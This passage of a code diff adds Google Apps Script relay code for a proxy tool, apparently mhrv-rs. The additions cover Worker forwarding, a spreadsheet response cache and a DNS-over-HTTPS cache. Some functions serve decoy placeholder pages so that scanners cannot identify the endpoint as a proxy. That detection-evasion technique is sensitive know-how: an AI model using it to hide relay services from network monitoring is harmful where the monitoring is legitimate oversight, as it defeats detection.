(AUTH_KEY or WORKER_URL still set to the +// placeholder) returns a loud error instead of silently accepting the +// placeholder secret or POSTing to a bogus URL. Configure AUTH_KEY +// and WORKER_URL above; leave these alone. +const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +const DEFAULT_WORKER_URL = "https://CHANGE_ME.workers.dev"; + +// Must match the Worker's MAX_BATCH_SIZE. Batches larger than this +// are split into chunks of this size and dispatched via fetchAll — +// each chunk costs 1 GAS UrlFetchApp call, so an N-URL batch costs +// ceil(N/CHUNK) calls (still much cheaper than the per-URL cost +// under standard Code.gs's fetchAll). +const WORKER_BATCH_CHUNK = 40; + +// Active-probing defense — same semantics as Code.gs. Bad-auth and +// malformed POST bodies receive a decoy HTML page that looks like a +// placeholder Apps Script web app instead of the JSON `{e}` error, +// so probes can't fingerprint the deployment as a relay endpoint. 
+// Flip to `true` only during initial setup if you need to debug an +// "unauthorized" loop, then flip back before sharing the deployment. +const DIAGNOSTIC_MODE = false; + +const SKIP_HEADERS = { + host: 1, connection: 1, "content-length": 1, + "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1, + "priority": 1, te: 1, +}; + +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

' + + ''; + +// ── Request Handlers ──────────────────────────────────────── + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +function doPost(e) { + try { + // Fail-closed if either constant is still the template default. + // Without this, a forgotten edit would either accept the placeholder + // secret as valid auth or POST to a literal "CHANGE_ME" URL — both + // are silent failure modes a deploy might miss. Surface them loud. + if (AUTH_KEY === DEFAULT_AUTH_KEY) { + return _json({ e: "configure AUTH_KEY in Code.cfw.gs" }); + } + if (WORKER_URL === DEFAULT_WORKER_URL) { + return _json({ e: "configure WORKER_URL in Code.cfw.gs" }); + } + + var req = JSON.parse(e.postData.contents); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); + + if (Array.isArray(req.q)) return _doBatch(req.q); + return _doSingle(req); + } catch (err) { + return _decoyOrError({ e: String(err) }); + } +} + +function doGet(e) { + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// ── Worker Forwarding ────────────────────────────────────── + +/** + * Strip headers that must not be forwarded (hop-by-hop / Apps-Script- + * managed). Returns a fresh header map; the input is never mutated. + */ +function _scrubHeaders(rawHeaders) { + var out = {}; + if (rawHeaders && typeof rawHeaders === "object") { + for (var k in rawHeaders) { + if (rawHeaders.hasOwnProperty(k) && !SKIP_HEADERS[k.toLowerCase()]) { + out[k] = rawHeaders[k]; + } + } + } + return out; +} + +/** + * Normalize one request item into the shape the Worker expects. + * Used for both single and batch paths — single mode wraps this in + * `{k, ...item}`; batch mode wraps it in `{k, q: [item, ...]}`. + * Auth key is added at envelope level by callers, not per-item. 
+ */ +function _normalizeItem(item) { + return { + u: item.u, + m: (item.m || "GET").toUpperCase(), + h: _scrubHeaders(item.h), + b: item.b || null, + ct: item.ct || null, + r: item.r !== false, + }; +} + +function _workerFetchOptions(payload) { + return { + url: WORKER_URL, + method: "post", + contentType: "application/json", + payload: JSON.stringify(payload), + muteHttpExceptions: true, + followRedirects: true, + validateHttpsCertificates: true, + }; +} + +// ── Single Request ───────────────────────────────────────── + +function _doSingle(req) { + if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) { + return _json({ e: "bad url" }); + } + + var item = _normalizeItem(req); + var envelope = { + k: AUTH_KEY, + u: item.u, + m: item.m, + h: item.h, + b: item.b, + ct: item.ct, + r: item.r, + }; + var opts = _workerFetchOptions(envelope); + // muteHttpExceptions covers HTTP-level errors (4xx/5xx come back as + // a normal HTTPResponse). It does NOT cover network-level failures + // — DNS resolution failure, TLS handshake failure, connection + // timeout to *.workers.dev, etc. — those throw. Catch and surface + // them as `{e}` so the operator debugging "why isn't my deployment + // responding?" gets a useful signal instead of the doPost outer + // catch returning the decoy HTML page (which makes the deployment + // look like a bad-auth probe to the client). Auth has already + // passed at this point so the probe-defence argument doesn't apply. + var resp; + try { + resp = UrlFetchApp.fetch(opts.url, opts); + } catch (err) { + return _json({ e: "worker unreachable: " + String(err) }); + } + return _json(_parseWorkerJson(resp)); +} + +// ── Batch Request ────────────────────────────────────────── + +/** + * Forward a batch to the Worker, chunking when needed. Each chunk + * becomes ONE POST to the Worker; the Worker fans out across the URLs + * in the chunk via Promise.all and returns `{q: [...]}` in the same + * order. 
Multiple chunks fire in parallel via UrlFetchApp.fetchAll. + * + * Quota cost: ceil(N / WORKER_BATCH_CHUNK) GAS UrlFetchApp calls for + * an N-URL batch. For typical mhrv-rs batches of 5-30 URLs this is + * exactly 1 call (vs N under standard Code.gs's fetchAll). Larger + * batches gracefully degrade to a few calls instead of failing under + * the Worker's own MAX_BATCH_SIZE soft cap. + * + * Bad-URL items are filtered locally so the Worker only sees valid + * inputs, then re-interleaved into the result array in original order + * so mhrv-rs's batch-index assumptions hold. + */ +function _doBatch(items) { + var validItems = []; + var errorMap = {}; + + for (var i = 0; i < items.length; i++) { + var item = items[i]; + if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) { + errorMap[i] = "bad url"; + continue; + } + validItems.push(_normalizeItem(item)); + } + + var workerResults = []; + if (validItems.length > 0) { + // Split into chunks ≤ WORKER_BATCH_CHUNK so each Worker call stays + // under the Worker's MAX_BATCH_SIZE cap. Single-chunk fast path + // avoids the fetchAll overhead for the common case. + var chunks = []; + for (var c = 0; c < validItems.length; c += WORKER_BATCH_CHUNK) { + chunks.push(validItems.slice(c, c + WORKER_BATCH_CHUNK)); + } + + var fetchOpts = chunks.map(function(chunk) { + return _workerFetchOptions({ k: AUTH_KEY, q: chunk }); + }); + + // muteHttpExceptions covers HTTP-level errors. Network-level + // failures (DNS, TLS, connection timeout to *.workers.dev) still + // throw — catch and convert to per-chunk `{e}` errors that get + // spread across each chunk's slots. mhrv-rs's per-item retry + // then handles them individually instead of getting the decoy + // HTML page from the doPost outer catch. See _doSingle for why + // the probe-defence argument doesn't apply post-auth. 
+ var responses; + try { + if (fetchOpts.length === 1) { + responses = [UrlFetchApp.fetch(fetchOpts[0].url, fetchOpts[0])]; + } else { + responses = UrlFetchApp.fetchAll(fetchOpts); + } + } catch (err) { + var unreachable = { e: "worker unreachable: " + String(err) }; + for (var u = 0; u < validItems.length; u++) workerResults.push(unreachable); + // Skip the per-response loop below by returning early through the + // reassembly code path. + responses = null; + } + + for (var r = 0; responses && r < responses.length; r++) { + var parsed = _parseWorkerJson(responses[r]); + if (parsed && Array.isArray(parsed.q)) { + for (var k = 0; k < parsed.q.length; k++) { + workerResults.push(parsed.q[k]); + } + } else { + // Per-chunk failure (worker error, parse failure, auth, etc). + // Spread the same error to every slot in this chunk so mhrv-rs + // retries each item individually rather than masking the + // failure. Other chunks are unaffected. + var slotErr = (parsed && parsed.e) + ? { e: parsed.e } + : { e: "worker batch failure" }; + for (var s = 0; s < chunks[r].length; s++) workerResults.push(slotErr); + } + } + } + + // Reassemble into the original order: validated slots get their + // worker result; invalid slots get their pre-flight error. + var results = []; + var wi = 0; + for (var j = 0; j < items.length; j++) { + if (errorMap.hasOwnProperty(j)) { + results.push({ e: errorMap[j] }); + } else { + results.push(workerResults[wi++] || { e: "missing worker response" }); + } + } + return _json({ q: results }); +} + +// ── Worker response handling ─────────────────────────────── + +/** + * Parse the Worker's JSON envelope. Worker errors come back as + * `{e: "..."}` — pass them through to the client unchanged so mhrv-rs + * sees the same error-shape it would for a direct-fetch failure in + * Code.gs. On HTTP errors from the Worker itself (auth failure, 5xx, + * etc.), wrap into `{e}` so the client gets a useful message instead + * of a parse-failure. 
+ */ +function _parseWorkerJson(resp) { + var code = resp.getResponseCode(); + var text = resp.getContentText(); + try { + return JSON.parse(text); + } catch (err) { + return { e: "worker " + code + ": " + (text.length > 200 ? text.substring(0, 200) + "…" : text) }; + } +} + +function _json(obj) { + return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType( + ContentService.MimeType.JSON + ); +} diff --git a/assets/apps_script/Code.gs b/assets/apps_script/Code.gs index 8c2acecd..3cc091db 100644 --- a/assets/apps_script/Code.gs +++ b/assets/apps_script/Code.gs @@ -6,18 +6,61 @@ * 2. Batch: POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] } * Uses UrlFetchApp.fetchAll() — all URLs fetched IN PARALLEL. * + * OPTIONAL SPREADSHEET-BACKED RESPONSE CACHE: + * Set CACHE_SPREADSHEET_ID to a valid Google Sheet ID (must be owned by + * the same account). When enabled, public GET requests are stored in the + * sheet and served from there on repeat visits, reducing UrlFetchApp + * quota consumption. The cache is Vary-aware (Accept-Encoding and + * Accept-Language are hashed into the compound cache key). Leave + * CACHE_SPREADSHEET_ID as-is to disable caching entirely — zero overhead. + * * DEPLOYMENT: * 1. Go to https://script.google.com → New project * 2. Delete the default code, paste THIS entire file - * 3. Click Deploy → New deployment - * 4. Type: Web app | Execute as: Me | Who has access: Anyone - * 5. Copy the Deployment ID into config.json as "script_id" + * 3. Change AUTH_KEY below to your own secret + * 4. (Optional) Set CACHE_SPREADSHEET_ID to enable caching + * 5. Click Deploy → New deployment + * 6. Type: Web app | Execute as: Me | Who has access: Anyone + * 7. Copy the Deployment ID into config.json as "script_id" * * CHANGE THE AUTH KEY BELOW TO YOUR OWN SECRET! */ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +// Active-probing defense. 
When false (production default), bad AUTH_KEY +// requests get a decoy HTML page that looks like a placeholder Apps +// Script web app instead of the JSON `{"e":"unauthorized"}` body. This +// makes the deployment indistinguishable from a forgotten-but-public +// Apps Script project to active scanners that POST malformed payloads +// looking for proxy endpoints. +// +// Set to `true` during initial setup if a misconfigured client is +// hitting "unauthorized" and you want the explicit JSON error to debug +// — then flip back to false before the deployment is widely shared. +// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.) +const DIAGNOSTIC_MODE = false; + +// ── Optional Spreadsheet Cache ────────────────────────────── +// Set to a valid Spreadsheet ID to enable response caching. +// Leave as-is to disable caching entirely (zero overhead). +const CACHE_SPREADSHEET_ID = "CHANGE_ME_TO_CACHE_SPREADSHEET_ID"; +const CACHE_SHEET_NAME = "RelayCache"; +const CACHE_META_SHEET_NAME = "RelayMeta"; +const CACHE_META_CURSOR_CELL = "A1"; + +// ── Cache Tuning ──────────────────────────────────────────── +const CACHE_MAX_ROWS = 5000; // circular buffer capacity +const CACHE_MAX_BODY_BYTES = 35000; // skip responses larger than ~35 KB +const CACHE_DEFAULT_TTL_SECONDS = 86400; // 24-hour fallback when no Cache-Control + +// ── Vary-Aware Cache Key ──────────────────────────────────── +// These request headers are hashed into the compound cache key +// alongside the URL so that responses with different encodings +// or languages never collide in the cache. Covers ~95 % of +// real-world Vary usage without inspecting the response. +const VARY_KEY_HEADERS = ["accept-encoding", "accept-language"]; + // Keep browser capability headers (sec-ch-ua*, sec-fetch-*) intact. // Some modern apps, notably Google Meet, use them for browser gating. const SKIP_HEADERS = { @@ -26,10 +69,33 @@ const SKIP_HEADERS = { "priority": 1, te: 1, }; +// Headers that disqualify a request from the cache path. 
+const CACHE_BUSTING_HEADERS = { + authorization: 1, cookie: 1, "x-api-key": 1, + "proxy-authorization": 1, "set-cookie": 1, +}; + +// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style +// placeholder page — no proxy-shaped JSON, nothing distinctive enough +// for a probe to fingerprint as a tunnel endpoint. +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

' + + ''; + +// ── Request Handlers ──────────────────────────────────────── + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + function doPost(e) { try { var req = JSON.parse(e.postData.contents); - if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" }); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); // Batch mode: { k, q: [...] } if (Array.isArray(req.q)) return _doBatch(req.q); @@ -37,14 +103,58 @@ function doPost(e) { // Single mode return _doSingle(req); } catch (err) { - return _json({ e: String(err) }); + // Parse failures of the request body are also probe-shaped — a real + // mhrv-rs client never sends invalid JSON. Decoy for the same reason. + return _decoyOrError({ e: String(err) }); } } +// `doGet` is what active scanners hit first (HTTP GET probes are cheaper +// than POSTs). Apps Script defaults to a "Script function not found" page +// here which is a fine-enough decoy on its own, but explicitly returning +// the same harmless placeholder makes the response identical to the +// bad-auth POST decoy — one less fingerprint vector. +function doGet(e) { + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// ── Single Request ───────────────────────────────────────── + function _doSingle(req) { if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) { return _json({ e: "bad url" }); } + + // ── Optional cache path ──────────────────────────────── + // Only entered when CACHE_SPREADSHEET_ID is configured and + // the request qualifies as a public, cachable GET. 
+ if (_canUseCache(req)) { + var cached = _getFromCache(req.u, req.h); + if (cached) { + return _json({ + s: cached.status, + h: JSON.parse(cached.headers), + b: cached.body, + cached: true, + }); + } + + var fetchResult = _fetchAndCache(req.u, req.h); + if (fetchResult) { + return _json({ + s: fetchResult.status, + h: JSON.parse(fetchResult.headers), + b: fetchResult.body, + cached: false, + }); + } + // If _fetchAndCache returns null (spreadsheet unavailable), + // fall through to the normal relay path below. + } + + // ── Normal relay (cache disabled or unavailable) ──────── var opts = _buildOpts(req); var resp = UrlFetchApp.fetch(req.u, opts); return _json({ @@ -54,6 +164,8 @@ function _doSingle(req) { }); } +// ── Batch Request ────────────────────────────────────────── + function _doBatch(items) { var fetchArgs = []; var errorMap = {}; @@ -92,6 +204,8 @@ function _doBatch(items) { return _json({ q: results }); } +// ── Request Building ─────────────────────────────────────── + function _buildOpts(req) { var opts = { method: (req.m || "GET").toLowerCase(), @@ -139,3 +253,404 @@ function _json(obj) { ContentService.MimeType.JSON ); } + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — SHEET MANAGEMENT +// ═══════════════════════════════════════════════════════════ + +function _initCacheSheet() { + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") { + return null; + } + try { + var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID); + var sheet = ss.getSheetByName(CACHE_SHEET_NAME); + if (!sheet) { + sheet = ss.insertSheet(CACHE_SHEET_NAME); + // Schema: URL_Hash | URL | Status | Headers | Body | Timestamp | Expires_At + sheet.getRange(1, 1, 1, 7).setValues([[ + "URL_Hash", "URL", "Status", "Headers", "Body", "Timestamp", "Expires_At" + ]]); + } + return sheet; + } catch (e) { + return null; + } +} + +function _getMetaSheet() { + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") { + return 
null; + } + try { + var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID); + var sheet = ss.getSheetByName(CACHE_META_SHEET_NAME); + if (!sheet) { + sheet = ss.insertSheet(CACHE_META_SHEET_NAME); + sheet.getRange(CACHE_META_CURSOR_CELL).setValue(2); + sheet.hideSheet(); + } + return sheet; + } catch (e) { + return null; + } +} + +function _getNextCursor(sheet, metaSheet) { + var cursorRange = metaSheet.getRange(CACHE_META_CURSOR_CELL); + var cursor = cursorRange.getValue(); + if (typeof cursor !== "number" || cursor < 2) cursor = 2; + + var totalRows = sheet.getDataRange().getNumRows(); + + if (totalRows < CACHE_MAX_ROWS + 1) { + return totalRows + 1; + } + + return cursor; +} + +function _advanceCursor(metaSheet, currentRow) { + var nextRow = currentRow + 1; + if (nextRow > CACHE_MAX_ROWS + 1) nextRow = 2; + metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(nextRow); +} + +function _ensureRowsAllocated(sheet) { + var totalRows = sheet.getDataRange().getNumRows(); + if (totalRows < CACHE_MAX_ROWS + 1) { + var needed = CACHE_MAX_ROWS + 1 - totalRows; + sheet.insertRowsAfter(totalRows, needed); + } +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — VARY-AWARE COMPOUND KEY +// ═══════════════════════════════════════════════════════════ + +/** + * Case-insensitive header lookup. + * HTTP header names are case-insensitive per RFC 7230 § 3.2. + */ +function _getHeaderCaseInsensitive(headers, targetKey) { + var target = targetKey.toLowerCase(); + for (var k in headers) { + if (headers.hasOwnProperty(k) && k.toLowerCase() === target) { + return headers[k]; + } + } + return null; +} + +/** + * Compute a compound cache key: + * MD5(URL | header1:value1 | header2:value2 | ...) + * + * Instead of reading the response Vary header (which would require + * fetching first — circular), we preemptively include the request + * headers that are known to cause response variation. 
This handles + * Vary: Accept-Encoding and Vary: Accept-Language without ever + * inspecting the response. + * + * Values are lowercased and whitespace-stripped so semantically + * identical requests from different clients produce the same hash. + * Missing and empty headers both map to "" (same semantic). + */ +function _getCacheKey(url, reqHeaders) { + var parts = [url]; + + if (reqHeaders && typeof reqHeaders === "object") { + for (var i = 0; i < VARY_KEY_HEADERS.length; i++) { + var headerName = VARY_KEY_HEADERS[i]; + var rawValue = _getHeaderCaseInsensitive(reqHeaders, headerName); + + if (rawValue && String(rawValue).trim() !== "") { + parts.push(headerName + ":" + rawValue.toLowerCase().replace(/\s/g, "")); + } else { + parts.push(headerName + ":"); + } + } + } else { + for (var j = 0; j < VARY_KEY_HEADERS.length; j++) { + parts.push(VARY_KEY_HEADERS[j] + ":"); + } + } + + var compoundKey = parts.join("|"); + return _md5Hex(compoundKey); +} + +function _md5Hex(input) { + var rawHash = Utilities.computeDigest(Utilities.DigestAlgorithm.MD5, input); + return rawHash + .map(function (byte) { + var v = (byte < 0) ? 256 + byte : byte; + return ("0" + v.toString(16)).slice(-2); + }) + .join(""); +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — CORE LOGIC +// ═══════════════════════════════════════════════════════════ + +/** + * Returns true if the request is eligible for the cache path: + * public GET, no body, no auth/cookie headers, cache configured. 
+ */ +function _canUseCache(req) { + if ((req.m || "GET") !== "GET") return false; + if (req.b) return false; + if (!req.u || !req.u.match(/^https?:\/\//i)) return false; + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") return false; + + if (req.h && typeof req.h === "object") { + for (var k in req.h) { + if (req.h.hasOwnProperty(k) && CACHE_BUSTING_HEADERS[k.toLowerCase()]) { + return false; + } + } + } + + return true; +} + +/** + * Extract max-age (seconds) from a Cache-Control header value. + * Returns 0 if the directive forbids caching (no-cache / no-store / + * private). Falls back to CACHE_DEFAULT_TTL_SECONDS when no header + * is present. Clamped to [60, 2592000] (1 min – 30 days). + */ +function _parseMaxAge(cacheControlHeader) { + if (!cacheControlHeader) return CACHE_DEFAULT_TTL_SECONDS; + + var lower = cacheControlHeader.toLowerCase(); + + if ( + lower.indexOf("no-cache") !== -1 || + lower.indexOf("no-store") !== -1 || + lower.indexOf("private") !== -1 + ) { + return 0; + } + + var match = lower.match(/max-age=(\d+)/); + if (match) { + var ttl = parseInt(match[1], 10); + return Math.max(60, Math.min(ttl, 2592000)); + } + + return CACHE_DEFAULT_TTL_SECONDS; +} + +/** + * Rewrite time-sensitive headers so the client sees accurate + * Date, Age, and Cache-Control values reflecting cache age. 
+ */ +function _refreshCachedHeaders(headersJson, timestamp) { + var headers = JSON.parse(headersJson); + var cachedAt = new Date(timestamp); + var now = new Date(); + var ageSeconds = Math.floor((now.getTime() - cachedAt.getTime()) / 1000); + + if (ageSeconds < 0) ageSeconds = 0; + + headers["Date"] = now.toUTCString(); + headers["Age"] = String(ageSeconds); + + var originalCc = headers["Cache-Control"] || headers["cache-control"]; + if (originalCc) { + headers["X-Original-Cache-Control"] = originalCc; + } + + var remainingMaxAge = Math.max(0, _parseMaxAge(originalCc) - ageSeconds); + headers["Cache-Control"] = "public, max-age=" + remainingMaxAge; + + headers["X-Cache"] = "HIT from relay-spreadsheet"; + headers["X-Cached-At"] = cachedAt.toUTCString(); + + return JSON.stringify(headers); +} + +/** + * Retrieve a cached response by compound cache key. + * Uses TextFinder for O(log n) lookup. Skips expired entries. + * Returns null on miss, expired entry, or unavailable sheet. + */ +function _getFromCache(url, reqHeaders) { + var sheet = _initCacheSheet(); + if (!sheet) return null; + + var hash = _getCacheKey(url, reqHeaders); + var finder = sheet.createTextFinder(hash).matchEntireCell(true); + var found = finder.findNext(); + + if (found) { + var row = sheet.getRange(found.getRow(), 1, 1, 7).getValues()[0]; + + var expiresAt = row[6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < new Date()) { + return null; + } + + return { + status: row[2], + headers: _refreshCachedHeaders(row[3], row[5]), + body: row[4], + }; + } + return null; +} + +/** + * Fetch a URL and store the response in the spreadsheet cache + * using a circular buffer (O(1) writes). Skips storage when the + * encoded body exceeds CACHE_MAX_BODY_BYTES or when Cache-Control + * forbids caching. Returns the fetch result regardless. 
+ */ +function _fetchAndCache(url, reqHeaders) { + var sheet = _initCacheSheet(); + if (!sheet) return null; + + try { + var response = UrlFetchApp.fetch(url, { muteHttpExceptions: true }); + var status = response.getResponseCode(); + var headers = _respHeaders(response); + var body = Utilities.base64Encode(response.getContent()); + + // Cell-size safety gate + if (body.length > CACHE_MAX_BODY_BYTES) { + return { status: status, headers: JSON.stringify(headers), body: body }; + } + + // TTL extraction + var cacheControl = + headers["Cache-Control"] || headers["cache-control"] || null; + var ttlSeconds = _parseMaxAge(cacheControl); + + if (ttlSeconds === 0) { + return { status: status, headers: JSON.stringify(headers), body: body }; + } + + var hash = _getCacheKey(url, reqHeaders); + var timestamp = new Date(); + var expiresAt = new Date(timestamp.getTime() + ttlSeconds * 1000); + + // Safety: fallback if Date math produces invalid result + if (isNaN(expiresAt.getTime())) { + expiresAt = new Date(timestamp.getTime() + CACHE_DEFAULT_TTL_SECONDS * 1000); + } + + var rowData = [ + hash, + url, + status, + JSON.stringify(headers), + body, + timestamp.toISOString(), + expiresAt, + ]; + + // Circular buffer write (O(1)) + var metaSheet = _getMetaSheet(); + if (metaSheet) { + _ensureRowsAllocated(sheet); + var writeRow = _getNextCursor(sheet, metaSheet); + sheet.getRange(writeRow, 1, 1, 7).setValues([rowData]); + _advanceCursor(metaSheet, writeRow); + } else { + // Fallback: simple append if meta sheet is unavailable + sheet.appendRow(rowData); + } + + return { status: status, headers: JSON.stringify(headers), body: body }; + } catch (e) { + return null; + } +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — DIAGNOSTICS +// ═══════════════════════════════════════════════════════════ + +function getCacheStats() { + var sheet = _initCacheSheet(); + if (!sheet) { + console.log("Cache is not enabled or spreadsheet unavailable."); + 
return; + } + + var data = sheet.getDataRange().getValues(); + var totalEntries = data.length - 1; + var now = new Date(); + var expiredCount = 0; + + for (var i = 1; i < data.length; i++) { + var expiresAt = data[i][6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < now) { + expiredCount++; + } + } + + var metaSheet = _getMetaSheet(); + var cursorInfo = "N/A"; + if (metaSheet) { + cursorInfo = String(metaSheet.getRange(CACHE_META_CURSOR_CELL).getValue()); + } + + console.log("=== CACHE STATS ==="); + console.log("Total rows used: " + totalEntries + " / " + CACHE_MAX_ROWS); + console.log("Active entries: " + (totalEntries - expiredCount)); + console.log("Expired entries: " + expiredCount); + console.log("Cursor position: " + cursorInfo); + console.log("Max body size: " + CACHE_MAX_BODY_BYTES + " chars"); + console.log("Default TTL: " + CACHE_DEFAULT_TTL_SECONDS + " sec"); + console.log("Vary key headers: " + VARY_KEY_HEADERS.join(", ")); + if (totalEntries > 0) { + console.log("Oldest entry: " + data[1][5]); + console.log("Newest entry: " + data[data.length - 1][5]); + } +} + +function clearExpiredCache() { + var sheet = _initCacheSheet(); + if (!sheet) { + console.log("Cache is not enabled."); + return; + } + + var data = sheet.getDataRange().getValues(); + var now = new Date(); + var rowsToClear = []; + + for (var i = 1; i < data.length; i++) { + var expiresAt = data[i][6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < now) { + rowsToClear.push(i + 1); + } + } + + for (var j = 0; j < rowsToClear.length; j++) { + sheet.getRange(rowsToClear[j], 1, 1, 7).clearContent(); + } + + console.log("Cleared " + rowsToClear.length + " expired entries (" + + (data.length - 1 - rowsToClear.length) + " remaining)."); +} + +function clearEntireCache() { + var sheet = _initCacheSheet(); + if (sheet) { + var totalRows = sheet.getDataRange().getNumRows(); + if (totalRows > 1) { + sheet.getRange(2, 1, totalRows - 1, 7).clearContent(); + } + } + + var 
metaSheet = _getMetaSheet(); + if (metaSheet) { + metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(2); + } + + console.log("Cache wiped. Cursor reset to row 2."); +} diff --git a/assets/apps_script/CodeFull.gs b/assets/apps_script/CodeFull.gs index 77b2a5e5..e47c64ff 100644 --- a/assets/apps_script/CodeFull.gs +++ b/assets/apps_script/CodeFull.gs @@ -16,18 +16,86 @@ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; const TUNNEL_SERVER_URL = "https://YOUR_TUNNEL_NODE_URL"; const TUNNEL_AUTH_KEY = "YOUR_TUNNEL_AUTH_KEY"; +// Active-probing defense. When false (production default), bad AUTH_KEY +// requests get a decoy HTML page that looks like a placeholder Apps +// Script web app instead of the JSON `{"e":"unauthorized"}` body. This +// makes the deployment indistinguishable from a forgotten-but-public +// Apps Script project to active scanners that POST malformed payloads +// looking for proxy endpoints. +// +// Set to `true` during initial setup if a misconfigured client is +// hitting "unauthorized" and you want the explicit JSON error to debug +// — then flip back to false before the deployment is widely shared. +// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.) +const DIAGNOSTIC_MODE = false; + const SKIP_HEADERS = { host: 1, connection: 1, "content-length": 1, "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1, "priority": 1, te: 1, }; +// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style +// placeholder page — no proxy-shaped JSON, nothing distinctive enough +// for a probe to fingerprint as a tunnel endpoint. +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

' + + ''; + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// Edge DNS cache. Plain UDP/53 queries normally traverse the full +// client → GAS → tunnel-node → public resolver path, and the +// trans-Atlantic round-trip dominates first-hop latency. When +// ENABLE_EDGE_DNS_CACHE is true, _doTunnelBatch intercepts udp_open +// ops with port=53, serves the reply from CacheService on a hit, or +// does its own DoH lookup on a miss from inside Google's network. +// Cache hits never reach the tunnel-node. +// +// Safety property: any failure (parse error, DoH unreachable, +// CacheService error, refused qtype) returns null from _edgeDnsTry, +// and the op falls through to the existing tunnel-node forward path. +// Set false to disable and forward all DNS through the tunnel as +// before. +const ENABLE_EDGE_DNS_CACHE = true; + +// DoH endpoints tried in order on cache miss. All speak RFC 8484 +// over GET. Apps Script's outbound network peers well to all three. +const EDGE_DNS_RESOLVERS = [ + "https://1.1.1.1/dns-query", + "https://dns.google/dns-query", + "https://dns.quad9.net/dns-query", +]; + +// CacheService bounds: 6h max TTL, 100KB per value, ~1000 keys, 250-char keys. +const EDGE_DNS_MIN_TTL_S = 30; +const EDGE_DNS_MAX_TTL_S = 21600; // 6h CacheService ceiling +// Used for NXDOMAIN/SERVFAIL and the rare "no answer + no SOA in authority" +// case. NOERROR/NODATA replies normally carry an SOA, and per RFC 2308 §5 +// we honor that SOA's TTL via _dnsMinTtl (the positive path). +const EDGE_DNS_NEG_TTL_S = 45; +const EDGE_DNS_CACHE_PREFIX = "edns:"; +// CacheService rejects keys longer than 250 chars. Names approaching the +// 253-char DNS limit + prefix + qtype digits can exceed that, so we bail +// before issuing the get/put. The op falls through to the tunnel-node. 
+const EDGE_DNS_MAX_KEY_LEN = 240; + +// qtypes we refuse to cache and pass through to the tunnel-node: +// 255 = ANY (resolvers handle it more correctly than we would) +const EDGE_DNS_REFUSE_QTYPES = { 255: 1 }; + // ========================== Entry point ========================== function doPost(e) { try { var req = JSON.parse(e.postData.contents); - if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" }); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); // Tunnel mode if (req.t) return _doTunnel(req); @@ -38,7 +106,9 @@ function doPost(e) { // Single relay mode return _doSingle(req); } catch (err) { - return _json({ e: String(err) }); + // Parse failures of the request body are also probe-shaped — a real + // mhrv-rs client never sends invalid JSON. Decoy for the same reason. + return _decoyOrError({ e: String(err) }); } } @@ -96,29 +166,102 @@ function _doTunnel(req) { .setMimeType(ContentService.MimeType.JSON); } -// Batch tunnel: forward all ops in one request to /tunnel/batch +// Batch tunnel: forward all ops in one request to /tunnel/batch. +// When ENABLE_EDGE_DNS_CACHE is true, udp_open/port=53 ops are served +// locally where possible and only the remainder is forwarded. function _doTunnelBatch(req) { - var payload = { - k: TUNNEL_AUTH_KEY, - ops: req.ops || [], - }; + var ops = (req && req.ops) || []; + + // Feature off: byte-identical to the pre-feature behavior. + if (!ENABLE_EDGE_DNS_CACHE) { + return _doTunnelBatchForward(ops); + } + + var results = new Array(ops.length); // sparse: filled by edge-DNS hits + var forwardOps = []; + var forwardIdx = []; + + for (var i = 0; i < ops.length; i++) { + var op = ops[i]; + if (op && op.op === "udp_open" && op.port === 53 && op.d) { + var synth = _edgeDnsTry(op); + if (synth) { + results[i] = synth; + continue; + } + } + forwardOps.push(op); + forwardIdx.push(i); + } + + // All ops served locally — no tunnel-node round-trip. 
